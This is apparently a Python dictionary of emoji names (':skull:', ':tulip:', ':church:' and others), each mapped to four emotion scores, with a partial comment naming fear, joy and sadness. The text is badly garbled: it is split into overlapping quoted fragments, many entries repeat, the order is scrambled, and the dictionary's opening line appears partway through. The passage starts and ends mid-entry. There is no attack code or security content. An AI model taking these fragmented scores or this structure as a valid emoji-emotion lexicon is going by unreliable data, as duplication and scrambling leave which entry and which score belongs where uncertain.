0.24], \":black_medium-small_square:\": [0.392, 0.21100000000000002, 0.18600000000000003, 0.255], 
\":backhand_index_pointing_up:\": [0.259, 0.142,", "0.295, 0.20600000000000002, 0.251], \":four_leaf_clover:\": [0.17, 0.16, 0.324, 0.156], \":wrapped_gift:\": [0.076, 0.188, 0.326, 0.057999999999999996],", "[0.105, 0.196, 0.302, 0.20199999999999999], \":old_man:\": [0.27, 0.263, 0.276, 0.215], \":calendar:\": [0.174, 0.21, 0.131,", "0.209, 0.158, 0.261], \":clipboard:\": [0.157, 0.233, 0.331, 0.21100000000000002], \":persevering_face:\": [0.327, 0.516, 0.175, 0.41600000000000004],", "0.061], \":bookmark:\": [0.257, 0.174, 0.182, 0.289], \":cat_face_with_wry_smile:\": [0.25, 0.083, 0.078, 0.121], \":tomato:\": [0.284,", "[0.157, 0.125, 0.063, 0.086], \":fast_up_button:\": [0.243, 0.23600000000000002, 0.251, 0.256], \":white_medium_star:\": [0.237, 0.175, 0.29,", "\":smirking_face:\": [0.258, 0.040999999999999995, 0.096, 0.146], \":face_screaming_in_fear:\": [0.292, 0.263, 0.133, 0.21], \":person_gesturing_NO:\": [0.28800000000000003, 0.28800000000000003,", "\":bride_with_veil:\": [0.193, 0.268, 0.502, 0.185], \":skull:\": [0.36200000000000004, 0.267, 0.055999999999999994, 0.218], \":pill:\": [0.195, 0.253,", "\":musical_note:\": [0.26, 0.191, 0.341, 0.32799999999999996], \":monkey:\": [0.179, 0.379, 0.083, 0.032], \":mouse_face:\": [0.18899999999999997, 0.20800000000000002,", "0.259, 0.38299999999999995, 0.215], \":graduation_cap:\": [0.162, 0.10300000000000001, 0.392, 0.126], \":inbox_tray:\": [0.205, 0.126, 0.14, 0.213],", "0.095, 0.127, 0.239], \":syringe:\": [0.21, 0.245, 0.142, 0.124], \":dotted_six-pointed_star:\": [0.249, 0.161, 0.34299999999999997, 0.282],", "0.152], \":boar:\": [0.187, 0.26899999999999996, 0.122, 0.158], \":boy:\": [0.171, 0.155, 0.225, 0.159], \":open_book:\": [0.196,", "0.057999999999999996], \":battery:\": [0.08199999999999999, 0.179, 0.196, 0.111], \":face_with_steam_from_nose:\": [0.39899999999999997, 0.21, 0.043, 0.22], \":white_medium_square:\": [0.395,", "[0.20600000000000002, 0.095, 0.28, 0.16], \":ten_o’clock:\": [0.141, 0.304, 
0.191, 0.309], \":red_triangle_pointed_up:\": [0.321, 0.243, 0.25,", "0.19899999999999998, 0.28600000000000003, 0.201], \":carp_streamer:\": [0.125, 0.212, 0.131, 0.095], \":smiling_face_with_smiling_eyes:\": [0.067, 0.073, 0.248, 0.247],", "\":face_blowing_a_kiss:\": [0.233, 0.022000000000000002, 0.215, 0.14400000000000002], \":information:\": [0.17800000000000002, 0.259, 0.264, 0.284], \":flower_playing_cards:\": [0.18100000000000002, 0.21100000000000002,", "\":wind_chime:\": [0.214, 0.17600000000000002, 0.271, 0.166], \":open_hands:\": [0.203, 0.18899999999999997, 0.16699999999999998, 0.23], \":flexed_biceps:\": [0.225, 0.251,", "0.321, 0.121], \":frog_face:\": [0.408, 0.29100000000000004, 0.19699999999999998, 0.16699999999999998], \":flashlight:\": [0.07400000000000001, 0.19699999999999998, 0.14300000000000002, 0.131], \":downcast_face_with_sweat:\":", "[0.113, 0.196, 0.111, 0.204], \":monkey_face:\": [0.19399999999999998, 0.327, 0.079, 0.061], \":bookmark:\": [0.257, 0.174, 0.182,", "0.161, 0.182], \":kitchen_knife:\": [0.321, 0.449, 0.075, 0.125], \":straight_ruler:\": [0.249, 0.20600000000000002, 0.215, 0.155], \":squinting_face_with_tongue:\":", "\":pager:\": [0.14400000000000002, 0.191, 0.22899999999999998, 0.259], \":anxious_face_with_sweat:\": [0.34299999999999997, 0.439, 0.134, 0.35200000000000004], \":tropical_drink:\": [0.14400000000000002, 0.17800000000000002,", "0.087, 0.19699999999999998], \":file_folder:\": [0.151, 0.217, 0.158, 0.205], \":megaphone:\": [0.239, 0.214, 0.16699999999999998, 0.22], \":bug:\":", "0.149, 0.322], \":ant:\": [0.26899999999999996, 0.308, 0.098, 0.11199999999999999], \":envelope_with_arrow:\": [0.251, 0.08800000000000001, 0.063, 0.19899999999999998], \":crying_cat_face:\":", "0.341, 0.32799999999999996], \":monkey:\": [0.179, 0.379, 0.083, 0.032], \":mouse_face:\": [0.18899999999999997, 0.20800000000000002, 0.136, 0.094], \":person_getting_massage:\":", "0.214, 0.14300000000000002], \":castle:\": [0.069, 
0.20199999999999999, 0.132, 0.222], \":bookmark_tabs:\": [0.13699999999999998, 0.228, 0.301, 0.23], \":face_savoring_food:\":", "0.242], \":clinking_beer_mugs:\": [0.096, 0.10099999999999999, 0.179, 0.132], \":smiling_face_with_sunglasses:\": [0.036000000000000004, 0.092, 0.026000000000000002, 0.09300000000000001], \":white_small_square:\": [0.276,", "\":moon_viewing_ceremony:\": [0.149, 0.14300000000000002, 0.43700000000000006, 0.231], \":tropical_fish:\": [0.063, 0.271, 0.14, 0.122], \":paw_prints:\": [0.266, 0.249,", "[0.13699999999999998, 0.228, 0.301, 0.23], \":face_savoring_food:\": [0.128, 0.107, 0.16899999999999998, 0.091], \":woman’s_sandal:\": [0.24600000000000002, 0.23600000000000002, 0.20800000000000002,", "0.055, 0.081, 0.193], \":up-left_arrow:\": [0.193, 0.214, 0.18600000000000003, 0.124], \":joker:\": [0.233, 0.28600000000000003, 0.051, 0.177],", "0.139], \":worried_face:\": [0.349, 0.397, 0.09699999999999999, 0.348], \":foggy:\": [0.162, 0.301, 0.317, 0.28300000000000003], \":turtle:\": [0.10800000000000001,", "0.254, 0.092, 0.262], \":memo:\": [0.147, 0.235, 0.26899999999999996, 0.203], \":face_with_open_mouth:\": [0.271, 0.29, 0.16, 0.295],", "\":backhand_index_pointing_right:\": [0.19699999999999998, 0.258, 0.249, 0.258], \":handbag:\": [0.099, 0.154, 0.223, 0.293], \":Libra:\": [0.14400000000000002, 0.193,", "\":trumpet:\": [0.128, 0.17800000000000002, 0.20600000000000002, 0.221], \":mouth:\": [0.245, 0.136, 0.321, 0.121], \":frog_face:\": [0.408, 0.29100000000000004,", "\":paperclip:\": [0.289, 0.21899999999999997, 0.19399999999999998, 0.231], \":outbox_tray:\": [0.204, 0.22899999999999998, 0.19699999999999998, 0.19399999999999998], \":woman’s_boot:\": [0.221, 0.095,", "0.28800000000000003, 0.11, 0.29600000000000004], \":fountain:\": [0.10099999999999999, 0.22899999999999998, 0.276, 0.292], \":seat:\": [0.155, 0.24, 0.067, 0.13699999999999998],", "[0.26899999999999996, 0.308, 0.098, 0.11199999999999999], \":envelope_with_arrow:\": [0.251, 
0.08800000000000001, 0.063, 0.19899999999999998], \":crying_cat_face:\": [0.257, 0.264, 0.24600000000000002,", "[0.179, 0.379, 0.083, 0.032], \":mouse_face:\": [0.18899999999999997, 0.20800000000000002, 0.136, 0.094], \":person_getting_massage:\": [0.264, 0.23199999999999998, 0.258,", "0.22899999999999998, 0.276, 0.292], \":seat:\": [0.155, 0.24, 0.067, 0.13699999999999998], \":reverse_button:\": [0.256, 0.262, 0.114, 0.29600000000000004],", "[0.292, 0.263, 0.133, 0.21], \":person_gesturing_NO:\": [0.28800000000000003, 0.28800000000000003, 0.11, 0.29600000000000004], \":fountain:\": [0.10099999999999999, 0.22899999999999998, 0.276,", "[0.165, 0.21600000000000003, 0.11900000000000001, 0.188], \":white_circle:\": [0.22, 0.16399999999999998, 0.121, 0.217], \":old_woman:\": [0.235, 0.299, 0.326,", "0.221, 0.24], \":ATM_sign:\": [0.128, 0.179, 0.135, 0.171], \":radio_button:\": [0.218, 0.209, 0.158, 0.261], \":clipboard:\":", "\":dress:\": [0.183, 0.16, 0.292, 0.242], \":blond-haired_person:\": [0.257, 0.23, 0.226, 0.166], \":love_letter:\": [0.13, 0.15,", "[0.251, 0.27, 0.095, 0.242], \":clinking_beer_mugs:\": [0.096, 0.10099999999999999, 0.179, 0.132], \":smiling_face_with_sunglasses:\": [0.036000000000000004, 0.092, 0.026000000000000002,", "0.09, 0.059000000000000004, 0.204], \":no_entry:\": [0.312, 0.445, 0.136, 0.344], \":water_wave:\": [0.106, 0.29, 0.12300000000000001, 0.222],", "[0.37, 0.423, 0.128, 0.355], \":alarm_clock:\": [0.17600000000000002, 0.28, 0.154, 0.22699999999999998], \":wine_glass:\": [0.046, 0.124, 0.218,", "0.16899999999999998, 0.12, 0.292], \":dog_face:\": [0.13, 0.18, 0.257, 0.084], \":no_one_under_eighteen:\": [0.109, 0.136, 0.051, 0.179],", "\":floppy_disk:\": [0.168, 0.324, 0.341, 0.308], \":orange_book:\": [0.18100000000000002, 0.193, 0.18600000000000003, 0.217], \":Japanese_castle:\": [0.092, 0.23199999999999998,", "\":ATM_sign:\": [0.128, 0.179, 0.135, 0.171], \":radio_button:\": [0.218, 0.209, 0.158, 0.261], \":clipboard:\": [0.157, 
0.233,", "0.264, 0.19399999999999998], \":woman:\": [0.24100000000000002, 0.215, 0.29, 0.142], \":two_hearts:\": [0.172, 0.08800000000000001, 0.38299999999999995, 0.142], \":dollar_banknote:\":", "0.172], \":laptop_computer:\": [0.127, 0.23399999999999999, 0.35, 0.255], \":mushroom:\": [0.188, 0.239, 0.21, 0.084], \":grinning_face_with_big_eyes:\": [0.19399999999999998,", "0.159, 0.272], \":glowing_star:\": [0.191, 0.215, 0.38, 0.134], \":person_swimming:\": [0.175, 0.159, 0.086, 0.245], \":ogre:\":", "0.20800000000000002, 0.153], \":hatching_chick:\": [0.099, 0.171, 0.16, 0.125], \":heavy_dollar_sign:\": [0.203, 0.149, 0.113, 0.228], \":Taurus:\":", "0.187, 0.154, 0.348], \":small_blue_diamond:\": [0.23, 0.18100000000000002, 0.24600000000000002, 0.23199999999999998], \":grinning_cat_face_with_smiling_eyes:\": [0.12, 0.161, 0.17600000000000002, 0.201],", "[0.12, 0.195, 0.08800000000000001, 0.222], \":locked:\": [0.146, 0.141, 0.196, 0.212], \":hammer:\": [0.33299999999999996, 0.42700000000000005, 0.221,", "\":cookie:\": [0.11699999999999999, 0.18, 0.168, 0.1], \":running_shirt:\": [0.138, 0.081, 0.20199999999999999, 0.203], \":heart_decoration:\": [0.13699999999999998, 0.046,", "0.17600000000000002, 0.233, 0.239], \":soccer_ball:\": [0.147, 0.332, 0.115, 0.41100000000000003], \":Santa_Claus:\": [0.131, 0.226, 0.254, 0.166],", "0.12300000000000001, 0.222], \":horse:\": [0.281, 0.172, 0.14800000000000002, 0.212], \":ewe:\": [0.29, 0.16899999999999998, 0.12, 0.292], \":dog_face:\":", "[0.254, 0.267, 0.276, 0.235], \":TOP_arrow:\": [0.162, 0.185, 0.205, 0.191], \":fearful_face:\": [0.344, 0.389, 0.08800000000000001,", "\":Leo:\": [0.24100000000000002, 0.221, 0.212, 0.24100000000000002], \":Japanese_congratulations_button:\": [0.158, 0.162, 0.255, 0.19899999999999998], \":waxing_gibbous_moon:\": [0.18100000000000002, 0.245,", "0.19899999999999998, 0.18], \":man_with_Chinese_cap:\": [0.255, 0.262, 0.126, 0.17600000000000002], \":kiss:\": [0.188, 0.122, 0.358, 
0.22699999999999998], \":closed_umbrella:\":", "0.316], \":bridge_at_night:\": [0.079, 0.151, 0.24, 0.247], \":briefcase:\": [0.17300000000000001, 0.192, 0.28600000000000003, 0.175], \":musical_notes:\": [0.149,", "[0.287, 0.247, 0.22, 0.22399999999999998], \":grapes:\": [0.17600000000000002, 0.155, 0.179, 0.17600000000000002], \":koala:\": [0.11900000000000001, 0.217, 0.11599999999999999,", "[0.136, 0.16, 0.159, 0.212], \":woman’s_clothes:\": [0.20800000000000002, 0.154, 0.179, 0.242], \":goblin:\": [0.42, 0.35, 0.149,", "\":person_surfing:\": [0.12, 0.195, 0.08800000000000001, 0.222], \":locked:\": [0.146, 0.141, 0.196, 0.212], \":hammer:\": [0.33299999999999996, 0.42700000000000005,", "0.168, 0.152], \":dress:\": [0.183, 0.16, 0.292, 0.242], \":blond-haired_person:\": [0.257, 0.23, 0.226, 0.166], \":love_letter:\":", "[0.122, 0.35, 0.191, 0.298], \":Pisces:\": [0.16899999999999998, 0.17600000000000002, 0.233, 0.239], \":soccer_ball:\": [0.147, 0.332, 0.115,", "0.131, 0.29100000000000004, 0.098], \":ghost:\": [0.147, 0.201, 0.017, 0.10800000000000001], \":telephone_receiver:\": [0.179, 0.16699999999999998, 0.10099999999999999, 0.311],", "0.131], \":part_alternation_mark:\": [0.203, 0.12300000000000001, 0.201, 0.305], \":magnifying_glass_tilted_right:\": [0.177, 0.253, 0.244, 0.12300000000000001], \":red_circle:\": [0.244,", "0.078, 0.121], \":tomato:\": [0.284, 0.22, 0.294, 0.23600000000000002], \":blue_book:\": [0.156, 0.191, 0.149, 0.193], \":headphone:\":", "0.095, 0.28, 0.16], \":ten_o’clock:\": [0.141, 0.304, 0.191, 0.309], \":red_triangle_pointed_up:\": [0.321, 0.243, 0.25, 0.214],", "0.253, 0.182, 0.203], \":package:\": [0.126, 0.18600000000000003, 0.214, 0.14300000000000002], \":castle:\": [0.069, 0.20199999999999999, 0.132, 0.222],", "0.316, 0.35700000000000004], \":dvd:\": [0.184, 0.14300000000000002, 0.319, 0.307], \":up-right_arrow:\": [0.19899999999999998, 0.22399999999999998, 0.159, 0.243], \":right_arrow_curving_up:\":", "0.37, 0.188], \":snake:\": 
[0.37, 0.35200000000000004, 0.16899999999999998, 0.166], \":floppy_disk:\": [0.168, 0.324, 0.341, 0.308], \":orange_book:\":", "0.23800000000000002, 0.295], \":yellow_heart:\": [0.158, 0.177, 0.27, 0.262], \":Gemini:\": [0.228, 0.132, 0.262, 0.177], \":hibiscus:\":", "0.17, 0.233, 0.228], \":elephant:\": [0.22399999999999998, 0.23399999999999999, 0.163, 0.156], \":yen_banknote:\": [0.217, 0.182, 0.171, 0.302],", "\":antenna_bars:\": [0.16399999999999998, 0.122, 0.151, 0.132], \":pouting_cat_face:\": [0.45399999999999996, 0.268, 0.11900000000000001, 0.295], \":index_pointing_up:\": [0.254, 0.233,", "[0.26899999999999996, 0.25, 0.147, 0.201], \":sheaf_of_rice:\": [0.188, 0.259, 0.38299999999999995, 0.215], \":graduation_cap:\": [0.162, 0.10300000000000001, 0.392,", "0.067, 0.13699999999999998], \":reverse_button:\": [0.256, 0.262, 0.114, 0.29600000000000004], \":heart_suit:\": [0.165, 0.12300000000000001, 0.336, 0.193], \":trident_emblem:\":", "0.11599999999999999, 0.226], \":purse:\": [0.105, 0.196, 0.302, 0.20199999999999999], \":old_man:\": [0.27, 0.263, 0.276, 0.215], \":calendar:\":", "0.14300000000000002, 0.177], \":ledger:\": [0.115, 0.17, 0.256, 0.182], \":shooting_star:\": [0.17600000000000002, 0.16, 0.377, 0.2], \":seedling:\":", "0.138], \":guard:\": [0.19, 0.23, 0.081, 0.17600000000000002], \":love_hotel:\": [0.040999999999999995, 0.141, 0.22899999999999998, 0.155], \":alien_monster:\": [0.128,", "[0.091, 0.251, 0.12300000000000001, 0.079], \":new_moon:\": [0.239, 0.221, 0.258, 0.29100000000000004], \":man’s_shoe:\": [0.276, 0.174, 0.11,", "\":violin:\": [0.17600000000000002, 0.139, 0.298, 0.22399999999999998], \":beating_heart:\": [0.171, 0.078, 0.32299999999999995, 0.157], \":grinning_face:\": [0.163, 0.17300000000000001,", "\":ten_o’clock:\": [0.141, 0.304, 0.191, 0.309], \":red_triangle_pointed_up:\": [0.321, 0.243, 0.25, 0.214], \":grinning_face_with_sweat:\": [0.19, 0.307,", "0.185], \":ear_of_corn:\": [0.141, 0.156, 0.182, 0.16699999999999998], 
\":pot_of_food:\": [0.18, 0.149, 0.177, 0.193], \":two_o’clock:\": [0.122,", "0.141, 0.156], \":e-mail:\": [0.26, 0.225, 0.21, 0.24], \":black_medium-small_square:\": [0.392, 0.21100000000000002, 0.18600000000000003, 0.255], \":backhand_index_pointing_up:\":", "0.051, 0.179], \":left-right_arrow:\": [0.32899999999999996, 0.37200000000000005, 0.214, 0.335], \":smiling_cat_face_with_heart-eyes:\": [0.304, 0.1, 0.319, 0.145], \":clapper_board:\":", "0.282, 0.145], \":game_die:\": [0.126, 0.162, 0.09, 0.179], \":person_pouting:\": [0.293, 0.244, 0.196, 0.299], \":sunrise_over_mountains:\":", "\":candy:\": [0.192, 0.184, 0.188, 0.12], \":Leo:\": [0.24100000000000002, 0.221, 0.212, 0.24100000000000002], \":Japanese_congratulations_button:\": [0.158, 0.162,", "0.217], \":Japanese_castle:\": [0.092, 0.23199999999999998, 0.16399999999999998, 0.149], \":chestnut:\": [0.212, 0.16699999999999998, 0.16899999999999998, 0.078], \":curry_rice:\": [0.161,", "0.19699999999999998, 0.188, 0.149], \":folded_hands:\": [0.187, 0.17800000000000002, 0.485, 0.35100000000000003], \":musical_note:\": [0.26, 0.191, 0.341, 0.32799999999999996],", "0.27, 0.174, 0.102], \":blowfish:\": [0.21, 0.214, 0.155, 0.138], \":bear_face:\": [0.205, 0.256, 0.129, 0.196],", "0.251, 0.231, 0.204], \":down_arrow:\": [0.33899999999999997, 0.268, 0.142, 0.252], \":snowboarder:\": [0.13699999999999998, 0.132, 0.028999999999999998, 0.20600000000000002],", "0.081, 0.237, 0.29], \":musical_score:\": [0.149, 0.09, 0.371, 0.315], \":white_square_button:\": [0.35100000000000003, 0.226, 0.225, 0.16699999999999998],", "0.345, 0.252], \":balloon:\": [0.042, 0.128, 0.102, 0.077], \":family:\": [0.249, 0.132, 0.418, 0.215], \":exclamation_question_mark:\":", "0.32, 0.249], \":antenna_bars:\": [0.16399999999999998, 0.122, 0.151, 0.132], \":pouting_cat_face:\": [0.45399999999999996, 0.268, 0.11900000000000001, 0.295], \":index_pointing_up:\":", "0.319], \":person_raising_hand:\": [0.068, 0.084, 0.08, 0.156], 
\":sweat_droplets:\": [0.26, 0.11900000000000001, 0.081, 0.16899999999999998], \":cherries:\": [0.171,", "0.243, 0.25, 0.214], \":grinning_face_with_sweat:\": [0.19, 0.307, 0.23199999999999998, 0.27699999999999997], \":loudly_crying_face:\": [0.24600000000000002, 0.276, 0.198, 0.272],", "0.284, 0.312, 0.20800000000000002], \":jack-o-lantern:\": [0.129, 0.327, 0.09, 0.092], \":wind_chime:\": [0.214, 0.17600000000000002, 0.271, 0.166],", "0.29600000000000004, 0.287, 0.19699999999999998], \":small_orange_diamond:\": [0.258, 0.162, 0.23399999999999999, 0.271], \":map_of_Japan:\": [0.122, 0.213, 0.24100000000000002, 0.152],", "0.12], \":dango:\": [0.27899999999999997, 0.193, 0.139, 0.054000000000000006], \":doughnut:\": [0.152, 0.259, 0.136, 0.15], \":fire:\": [0.306,", "[0.191, 0.21899999999999997, 0.25, 0.121], \":crossed_flags:\": [0.114, 0.048, 0.039, 0.207], \":input_latin_uppercase:\": [0.182, 0.175, 0.161,", "[0.16399999999999998, 0.26899999999999996, 0.14800000000000002, 0.29], \":television:\": [0.322, 0.247, 0.22699999999999998, 0.222], \":face_blowing_a_kiss:\": [0.233, 0.022000000000000002, 0.215,", "0.182], \":kitchen_knife:\": [0.321, 0.449, 0.075, 0.125], \":straight_ruler:\": [0.249, 0.20600000000000002, 0.215, 0.155], \":squinting_face_with_tongue:\": [0.083,", "0.09699999999999999, 0.348], \":foggy:\": [0.162, 0.301, 0.317, 0.28300000000000003], \":turtle:\": [0.10800000000000001, 0.251, 0.239, 0.08], \":Tokyo_tower:\":", "0.258, 0.182, 0.225], \":twelve_o’clock:\": [0.18600000000000003, 0.34700000000000003, 0.165, 0.349], \":kimono:\": [0.14400000000000002, 0.196, 0.23800000000000002, 0.222],", "0.078, 0.159], \":left_arrow_curving_right:\": [0.138, 0.275, 0.228, 0.22899999999999998], \":palm_tree:\": [0.035, 0.34299999999999997, 0.129, 0.23800000000000002], \":honeybee:\":", "0.196, 0.13699999999999998, 0.214], \":two-hump_camel:\": [0.151, 0.263, 0.131, 0.154], \":white_flower:\": [0.187, 0.141, 0.19, 0.14400000000000002],", "\":Christmas_tree:\": 
[0.13699999999999998, 0.17, 0.285, 0.081], \":chicken:\": [0.16899999999999998, 0.192, 0.218, 0.127], \":sparkling_heart:\": [0.217, 0.068,", "[0.12300000000000001, 0.077, 0.069, 0.166], \":angry_face_with_horns:\": [0.385, 0.257, 0.03, 0.21100000000000002], \":kissing_face_with_smiling_eyes:\": [0.203, 0.126, 0.256,", "0.249], \":antenna_bars:\": [0.16399999999999998, 0.122, 0.151, 0.132], \":pouting_cat_face:\": [0.45399999999999996, 0.268, 0.11900000000000001, 0.295], \":index_pointing_up:\": [0.254,", "0.179, 0.262], \":grinning_face_with_smiling_eyes:\": [0.184, 0.19699999999999998, 0.188, 0.149], \":folded_hands:\": [0.187, 0.17800000000000002, 0.485, 0.35100000000000003], \":musical_note:\":", "\":smiling_face_with_heart-eyes:\": [0.307, 0.18, 0.308, 0.13699999999999998], \":kissing_face:\": [0.215, 0.171, 0.159, 0.272], \":glowing_star:\": [0.191, 0.215,", "0.273], \":nail_polish:\": [0.418, 0.121, 0.314, 0.099], \":nine_o’clock:\": [0.15, 0.36700000000000005, 0.19699999999999998, 0.331], \":rice_ball:\": [0.10300000000000001,", "[0.217, 0.182, 0.171, 0.302], \":warning:\": [0.264, 0.293, 0.107, 0.212], \":shortcake:\": [0.126, 0.196, 0.166,", "0.142], \":dollar_banknote:\": [0.21, 0.19, 0.149, 0.192], \":camera:\": [0.198, 0.29600000000000004, 0.287, 0.19699999999999998], \":small_orange_diamond:\": [0.258,", "\":locked_with_key:\": [0.20600000000000002, 0.095, 0.28, 0.16], \":ten_o’clock:\": [0.141, 0.304, 0.191, 0.309], \":red_triangle_pointed_up:\": [0.321, 0.243,", "0.113], \":necktie:\": [0.20199999999999999, 0.094, 0.11199999999999999, 0.147], \":card_index:\": [0.147, 0.196, 0.249, 0.212], \":red_triangle_pointed_down:\": [0.304,", "0.33399999999999996, 0.19899999999999998], \":bread:\": [0.142, 0.205, 0.18100000000000002, 0.156], \":hotel:\": [0.075, 0.24600000000000002, 0.196, 0.184], \":lipstick:\":", "0.231, 0.099, 0.326], \":neutral_face:\": [0.415, 0.309, 0.149, 0.322], \":ant:\": [0.26899999999999996, 0.308, 0.098, 0.11199999999999999],", 
"\":couple_with_heart:\": [0.165, 0.113, 0.409, 0.25], \":relieved_face:\": [0.127, 0.182, 0.254, 0.13699999999999998], \":grimacing_face:\": [0.161, 0.32799999999999996,", "0.099, 0.19699999999999998, 0.11199999999999999], \":down-right_arrow:\": [0.23, 0.242, 0.10300000000000001, 0.175], \":wedding:\": [0.092, 0.139, 0.631, 0.252],", "[0.299, 0.33, 0.316, 0.35700000000000004], \":dvd:\": [0.184, 0.14300000000000002, 0.319, 0.307], \":up-right_arrow:\": [0.19899999999999998, 0.22399999999999998, 0.159,", "0.226, 0.249], \":nose:\": [0.38299999999999995, 0.272, 0.18600000000000003, 0.52], \":closed_book:\": [0.19899999999999998, 0.162, 0.256, 0.16], \":basketball:\":", "0.172, 0.235], \":church:\": [0.20800000000000002, 0.276, 0.773, 0.366], \":cyclone:\": [0.16899999999999998, 0.28800000000000003, 0.177, 0.214], \":black_large_square:\":", "[0.053, 0.14, 0.07, 0.08], \":chart_decreasing:\": [0.28800000000000003, 0.396, 0.294, 0.38299999999999995], \":upwards_button:\": [0.264, 0.261, 0.23800000000000002,", "[0.14400000000000002, 0.17800000000000002, 0.159, 0.11900000000000001], \":baby:\": [0.266, 0.201, 0.457, 0.156], \":wheelchair_symbol:\": [0.18, 0.179, 0.09300000000000001,", "0.233], \":baby_angel:\": [0.20600000000000002, 0.19699999999999998, 0.414, 0.371], \":bar_chart:\": [0.213, 0.255, 0.41, 0.228], \":locked_with_key:\": [0.20600000000000002,", "0.247], \":mount_fuji:\": [0.196, 0.225, 0.253, 0.172], \":play_button:\": [0.168, 0.284, 0.17, 0.17800000000000002], \":high_voltage:\": [0.252,", "0.301, 0.23], \":face_savoring_food:\": [0.128, 0.107, 0.16899999999999998, 0.091], \":woman’s_sandal:\": [0.24600000000000002, 0.23600000000000002, 0.20800000000000002, 0.23], \":man:\":", "0.336, 0.193], \":trident_emblem:\": [0.228, 0.14400000000000002, 0.21899999999999997, 0.257], \":five_o’clock:\": [0.126, 0.335, 0.21, 0.264], \":unamused_face:\":", "\":black_medium_square:\": [0.445, 0.245, 0.21, 0.264], \":Capricorn:\": [0.196, 0.172, 0.3, 0.179], 
\":pool_8_ball:\": [0.257, 0.09,", "0.24600000000000002], \":night_with_stars:\": [0.09, 0.174, 0.298, 0.289], \":tulip:\": [0.175, 0.245, 0.37, 0.188], \":snake:\": [0.37,", "0.069, 0.166], \":angry_face_with_horns:\": [0.385, 0.257, 0.03, 0.21100000000000002], \":kissing_face_with_smiling_eyes:\": [0.203, 0.126, 0.256, 0.138], \":woman’s_hat:\":", "\":honeybee:\": [0.381, 0.285, 0.128, 0.111], \":rabbit_face:\": [0.165, 0.222, 0.217, 0.037000000000000005], \":pensive_face:\": [0.261, 0.40399999999999997,", "\":black_small_square:\": [0.319, 0.249, 0.141, 0.22699999999999998], \":spade_suit:\": [0.24600000000000002, 0.213, 0.187, 0.27899999999999997], \":performing_arts:\": [0.159, 0.10800000000000001,", "0.13699999999999998], \":hear-no-evil_monkey:\": [0.303, 0.27699999999999997, 0.094, 0.28300000000000003], \":circus_tent:\": [0.113, 0.196, 0.111, 0.204], \":monkey_face:\": [0.19399999999999998,", "0.391, 0.107], \":SOON_arrow:\": [0.12300000000000001, 0.179, 0.191, 0.302], \":cooking:\": [0.078, 0.221, 0.139, 0.11800000000000001], \":slot_machine:\":", "0.23, 0.226, 0.166], \":love_letter:\": [0.13, 0.15, 0.331, 0.142], \":bomb:\": [0.22, 0.196, 0.163, 0.205],", "0.162], \":first_quarter_moon_face:\": [0.11, 0.10300000000000001, 0.32, 0.22699999999999998], \":sake:\": [0.145, 0.255, 0.282, 0.145], \":game_die:\": [0.126,", "0.28, 0.12300000000000001], \":smirking_face:\": [0.258, 0.040999999999999995, 0.096, 0.146], \":face_screaming_in_fear:\": [0.292, 0.263, 0.133, 0.21], \":person_gesturing_NO:\":", "\":smiling_face:\": [0.095, 0.13, 0.245, 0.17600000000000002], \":skis:\": [0.10300000000000001, 0.077, 0.051, 0.192], \":clapping_hands:\": [0.21899999999999997, 0.256,", "\":smiling_cat_face_with_heart-eyes:\": [0.304, 0.1, 0.319, 0.145], \":clapper_board:\": [0.213, 0.196, 0.237, 0.162], \":first_quarter_moon_face:\": [0.11, 0.10300000000000001,", "\":elephant:\": [0.22399999999999998, 0.23399999999999999, 0.163, 0.156], \":yen_banknote:\": [0.217, 0.182, 
0.171, 0.302], \":warning:\": [0.264, 0.293,", "0.201, 0.284, 0.168], \":three_o’clock:\": [0.16699999999999998, 0.369, 0.209, 0.282], \":sunflower:\": [0.203, 0.243, 0.354, 0.212],", "fear, joy, sadness emoji_emotions = { \":person_surfing:\": [0.12, 0.195, 0.08800000000000001, 0.222], \":locked:\": [0.146,", "0.153], \":four_o’clock:\": [0.165, 0.361, 0.171, 0.282], \":jeans:\": [0.2, 0.109, 0.134, 0.209], \":blossom:\": [0.20199999999999999,", "\":love_letter:\": [0.13, 0.15, 0.331, 0.142], \":bomb:\": [0.22, 0.196, 0.163, 0.205], \":direct_hit:\": [0.177, 0.213,", "0.218, 0.302, 0.27399999999999997], \":black_circle:\": [0.335, 0.212, 0.17600000000000002, 0.3], \":left_arrow:\": [0.282, 0.221, 0.126, 0.19899999999999998],", "0.249], \":nose:\": [0.38299999999999995, 0.272, 0.18600000000000003, 0.52], \":closed_book:\": [0.19899999999999998, 0.162, 0.256, 0.16], \":basketball:\": [0.171,", "\":grapes:\": [0.17600000000000002, 0.155, 0.179, 0.17600000000000002], \":koala:\": [0.11900000000000001, 0.217, 0.11599999999999999, 0.109], \":paperclip:\": [0.289, 0.21899999999999997,", "0.191, 0.17300000000000001, 0.129], \":cherry_blossom:\": [0.122, 0.19699999999999998, 0.31, 0.13], \":heart_with_ribbon:\": [0.106, 0.172, 0.41700000000000004, 0.14400000000000002],", "0.316], \":crown:\": [0.33299999999999996, 0.11800000000000001, 0.268, 0.127], \":dizzy:\": [0.233, 0.147, 0.359, 0.134], \":six_o’clock:\": [0.14300000000000002,", "[0.11199999999999999, 0.11599999999999999, 0.138, 0.139], \":pager:\": [0.14400000000000002, 0.191, 0.22899999999999998, 0.259], \":anxious_face_with_sweat:\": [0.34299999999999997, 0.439, 0.134,", "0.158], \":artist_palette:\": [0.136, 0.11800000000000001, 0.442, 0.057999999999999996], \":battery:\": [0.08199999999999999, 0.179, 0.196, 0.111], \":face_with_steam_from_nose:\": [0.39899999999999997,", "0.095], \":smiling_face_with_smiling_eyes:\": [0.067, 0.073, 0.248, 0.247], \":mount_fuji:\": [0.196, 0.225, 0.253, 0.172], \":play_button:\": 
[0.168,", "0.242, 0.42700000000000005], \":seven_o’clock:\": [0.15, 0.35, 0.08900000000000001, 0.33], \":smiling_face_with_horns:\": [0.213, 0.055, 0.081, 0.193], \":up-left_arrow:\":", "0.175, 0.41600000000000004], \":down-left_arrow:\": [0.13699999999999998, 0.171, 0.151, 0.12], \":dango:\": [0.27899999999999997, 0.193, 0.139, 0.054000000000000006], \":doughnut:\":", "0.17800000000000002, 0.122, 0.315], \":cityscape_at_dusk:\": [0.053, 0.24, 0.259, 0.23399999999999999], \":steaming_bowl:\": [0.183, 0.129, 0.16699999999999998, 0.226],", "0.20600000000000002, 0.251], \":four_leaf_clover:\": [0.17, 0.16, 0.324, 0.156], \":wrapped_gift:\": [0.076, 0.188, 0.326, 0.057999999999999996], \":face_without_mouth:\":", "0.129, 0.185], \":tiger_face:\": [0.13, 0.392, 0.07400000000000001, 0.259], \":sunrise:\": [0.107, 0.292, 0.4, 0.158], 